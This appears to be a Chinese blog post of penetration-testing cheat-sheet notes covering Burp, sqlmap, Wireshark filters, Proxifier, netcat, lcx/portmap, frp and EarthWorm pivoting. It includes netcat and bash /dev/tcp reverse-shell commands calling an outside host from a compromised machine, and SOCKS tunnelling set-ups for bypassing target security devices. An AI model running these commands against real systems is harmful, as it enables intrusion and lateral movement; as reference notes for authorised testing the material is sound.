shell反弹/端口转发/端口映射/内网穿透/代理/SSH中转/协议转换/DNS防污染/抓包

burp直接抓取windows微信小程序与公众号数据包

https://www.bilibili.com/video/av79384091/

 

burpsuite


代理工具 Proxifier -设置代理链

- 导入注入字典爆破
- 导入sqlmap插件使用
- 配置log日志批量 - sqlmap.py -l burp.log --batch -smart --level <= 5 --risk <=3
结果以csv格式保存在.sqlmap/output 日志过滤工具 - BurpLogFilter-master

WireSHark

用途                            
可行       不可行                        
查看封包    修改、发送封包、不能解密HTTPS,所以wireshark看不懂HTTPS中的内容                        
                            
过滤:                            
tcp.srcport == 80    tcp协议80端口                        
ip.src ==192.168.1.102     显示源地址为192.168.1.102                        
ip.dst==192.168.1.102    目标地址为192.168.1.102                        
ip.src ==192.168.1.102 or ip.dst==192.168.1.102    源地址或者目标地址是192.168.1.102                        
http.request.method=="GET"    显示Get请求                        
http:cookie    捕获含有cookie的数据包                        
                            
                            
可获取信息                            
服务器ip/开放端口/操作系统版本/数据库类型/连接的数据库名称                            

Fiddler

抓本地    带上端口如:localhost:8080

tcpdump

tcpdump -i eth0 -w /home/linger/ip_18.cap

proxifier

支持Windows XP/Vista/Win7/Win10 和 MacOS,支持http/https、socks4/5、TCP、UDP等协议,可以指定端口,指定IP,指定域名、指定程序、指定用户名密码授权等运行模式

1.proxifier + ssr实现全局代理

(1)
  • 点击Proxy Server按钮

  • add

  • 输入本地shadowshocks的ip(默认127.0.0.1)和端口(默认1080)

  • 选择SHOCKS Versin 5

  • 然后点击check

  • OK - 显示Proxy is ready to work with Proxfier

(2)

  • 点击Proxification Rule
  • 选中localhost,点击Edit
  • Target hosts处添加shadowshocks代理服务器的IP地址
  • Action选择Direct(直连)
  • OK - 此配置步骤允许发送到代理服务器的数据包通过,防止循环代理错误

(3)

  • 点击Name Resolution
  • 选择第二个Resolve hostnames through proxy(通过代理服务器解析域名)
  • OK

(4)

检测:

(1)cmd -》 nslookup www.google.com测试是否成功获取其IP地址

(2)访问www.ip138.com查看当前外网IP地址

 

2.proxifier + 夜游模拟器 + Burpsuite 实现APP流量抓包

(1)

设置Proxifier代理服务器,代理服务器设置为burp监听端口

(2)

设置代理规则,将`NoxVMHandle Frontend`进程对应的应用程序文件加入代理规则

(3)

将Burp的CA证书文件复制到模拟器安装 - 虚拟机都是用的虚拟网卡 不能直接访问到宿主机

(4)

proxifier中获取到模拟器内对应app的流量,模拟器的流量就全部走向Burp

nc

nc.exe -help   #帮助
nc -lvp 4444  #监听端口
nc -t -e cmd.exe 公网主机ip 4444   #监听端口
nc -l -p 4444 -t -e cmd.exe   #正向连接
nc -vv 远程主机ip 4444        #正向连接

结合SQLMap

nc –vv –l –p 8080
在sqlmap的shell段执行:
bash -i>& /dev/tcp/24.11.123.2xx/8080 0>&1
说明:
 在24.11.123.2xx上执行上面的nc监听命令
 24.11.123.2xx服务器需要对8080端口开放

 

LCX(Windows)/Portmap(Linux)

一:[Host2]可以联通[Host1]且[Host3]可以联通[Host1] || [Host2]主动连接[Host1]导致可绕过[Host2]机器上的安全设备
攻击机[Host3] 靶机[Host2] 中间机器[Host1]
1.[Host1]监听[POrt1]请求,并将来自[Port1]的请求传送给[Port2]
./portmap -m 2 -p1 [POrt1] -h2 127.0.0.1 (|| [IP]) -p2 Port[2](Linux)
lcx.exe –listen [Port1] [POrt2](Windows)

2.[Host2]连接[Host1]的[Port1] 并将[Port3]进行映射
./portmap -m 3 -h1 127.0.0.1(||[IP]) -p1 22 -h2 [Host1-IP] -p2 [Port1] (Linux)
lcx.exe -slave [Host1-IP] [Port1] 127.0.0.1(||[IP]) [Port3] (Windows)

3. [Host3]上执行连接命令
mstsc || ssh -> [Host2]:[POrt2]

二:[Host1]可以联通[Host2]且[Host3]可以联通[Host1]
攻击机[Host3] 靶机[Host2] 中间机器[Host1]
1.[Host1]上执行命令将[Host2]的[Port2]转发的[Host1]的[Port1] lcx
-tran [Port1] [Host2-IP] [Port2] (Windwos)
2. [Host3]上执行连接命令
mstsc || ssh -> [HOst1]:[Port1]

 

frp

一:反向代理端口
服务端配置:frps.ini

[common]
bind_port = [Port1]

dashboard_user = xxx

dashboard_pwd = xxx

dashboard_port = [Port2]

 

客户端配置:frpc.ini

[common]
server_addr = [Server-IP]
server_port = [Port1]

[RDP]
type = tcp
local_ip = 127.0.0.1
local_port = [Port3](3389)
remote_port = [Port4]

 

 

nps

工具  Tunna、reDuh

netsh

ss

proxychains

支持socks通信

 

PortTran

Proxy-Go 

https://github.com/snail007/goproxy

 

内网-》外网实现穿透

花生壳

Ngrok 

EW

./ew -s ssocksd -l 1080   #正向 SOCKS v5 服务器

反弹 SOCKS v5 服务器:
$ ./ew -s rcsocks -l 1080 -e 8888  #公网 ip 的主机上运行
$ ./ew -s rssocks -d 1.1.1.1 -e 8888  #在目标主机上启动 SOCKS v5 服务并反弹到公网主机的 8888端口

多级级联
$ ./ew -s lcx_listen -l 1080 -e 8888
$ ./ew -s lcx_tran -l 1080 -f 2.2.2.3 -g 9999
$ ./ew -s lcx_slave -d 1.1.1.1 -e 8888 -f 2.2.2.3 -g 9999

lcx_tran
$ ./ew -s ssocksd -l 9999
$ ./ew -s lcx_tran -l 1080 -f 127.0.0.1 -g 9999

lcx_listen、lcx_slave
$ ./ew -s lcx_listen -l 1080 -e 8888
$ ./ew -s ssocksd -l 9999
$ ./ew -s lcx_slave -d 127.0.0.1 -e 8888 -f 127.0.0.1 -g 9999

三级级联的本地SOCKS
$ ./ew -s rcsocks -l 1080 -e 8888
$ ./ew -s lcx_slave -d 127.0.0.1 -e 8888 -f 127.0.0.1 -g 9999
$ ./ew -s lcx_listen -l 9999 -e 7777
$ ./ew -s rssocks -d 127.0.0.1 -e 7777

Termite

reGeorg

Proxy Tools

https://github.com/Hackplayers/4nonimizer
https://github.com/susmithHCK/torghost
https://github.com/flagellantX/tor-with-privoxy
https://dotvpn.com/en/

https://github.com/shadow1ng/ProxyPool

 

ProxyPool

posted @ 2019-07-16 16:26  7hang  阅读(961)  评论(0编辑  收藏  举报